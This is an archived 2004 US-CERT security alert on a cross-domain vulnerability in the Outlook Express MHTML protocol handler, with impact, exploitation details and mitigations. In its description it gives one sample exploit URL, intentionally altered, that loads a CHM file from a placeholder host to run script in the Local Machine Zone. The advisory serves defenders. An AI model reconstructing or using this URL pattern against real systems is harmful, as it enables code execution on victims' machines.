U.S. Flag Official website of the Department of Homeland Security

Note: This page is part of the us-cert.gov archive.This document is part of the US-CERT website archive. These documents are no longer updated and may contain outdated information. Links may also no longer function. Please contact info@us-cert.gov if you have any questions about the US-CERT website archive.

TLP:WHITE

Alert (TA04-099A)

Cross-Domain Vulnerability in Outlook Express MHTML Protocol Handler

Original release date: April 08, 2004 | Last revised: April 26, 2004

Systems Affected

  • Microsoft Windows systems

Overview

A cross-domain vulnerability in the Outlook Express MIME Encapsulation of Aggregate HTML Documents (MHTML) protocol handler could allow an attacker to execute arbitrary code with the privileges of the user invoking the handler. The attacker may also be able to read and manipulate data on web sites in other domains or zones.

Description

There is a cross-domain vulnerability in the way the Outlook Express MHTML protocol handler (mhtml:) determines the security domain of data referenced by a URL that specifies an alternate location. When the MHTML handler references an inaccessible or non-existent file, the handler can access a file from an alternate location. The MHTML handler incorrectly treats the file from the alternate location as if it were in the same domain as the unavailable file.

The MHTML protocol handler is considered to be part of Outlook Express and is installed by default on all current Windows systems. The MHTML protocol handler is effectively a shared Windows component. Any program that exposes an MHTML protocol reference to the operating system will invoke the handler, typically using Internet Explorer (IE).

Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs.

US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.

Impact

By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content).

Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names.

Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:.

When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model.

Any programs, including other web browsers, that use the Windows protocol handlers (URL monikers) for ITS or MHTML protocols could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively).

A malicious web site or email message may contain HTML similar to the following:

ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html
(This URL is intentionally modified to avoid detection by anti-virus software.)
In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code.

Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software.

Solution

Install a patch

Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013.

Disable ITS and MHTML protocol handlers

Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}
Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed. Follow good Internet security practices

These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating factors and Workarounds in the Vulnerability Details section of MS04-013.

  • Disable Active scripting and ActiveX controls

    NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.

    Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.

    Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.
  • Do not follow unsolicited links

    Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

  • Maintain updated anti-virus software

    Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Microsoft Corporation

Please see Microsoft Security Bulletin MS04-013.

Appendix B. References

  • Vulnerability Note VU#323070 - http://www.kb.cert.org/vuls/id/323070>
  • US-CERT Computer Virus Resources - http://www.us-cert.gov//reading_room/virus.html>
  • CVE CAN-2004-0380 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
  • Microsoft Security Bulletin MS04-013 - http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx>
  • Introduction to URL Security Zones - http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
  • About Cross-Frame Scripting and Security - http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
  • MIME Type Determination in Internet Explorer - http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
  • URL Monikers - http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
  • Asynchronous Pluggable Protocols - http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
  • Microsoft HTML Help 1.4 SDK - http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
  • Microsoft Knowledge Base Article 182569 - http://support.microsoft.com/default.aspx?scid=182569>
  • Microsoft Knowledge Base Article 174360 - http://support.microsoft.com/default.aspx?scid=174360>
  • Microsoft Knowledge Base Article 833633 - http://support.microsoft.com/default.aspx?scid=833633>
  • Windows XP Service Pack 2 Technical Preview - http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
  • AusCERT Update AU-2004.007 - http://www.auscert.org.au/3990>


This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration.


Feedback can be directed to the author: Art Manion.


Revision History

  • April 8, 2004: Initial release
    April 13, 2004: Added patch and vendor information (MS04-013), credited Liu Die Yu, updated vulnerability, impact, and workaround information about MHTML
    April 23. 2004: Thanked http-equiv April 26, 2004: Further modified sample exploit URL to minimize AV detection

    Last updated

This product is provided subject to this Notification and this Privacy & Use policy.

Was this document helpful?  Yes  |  Somewhat  |  No

Back to Top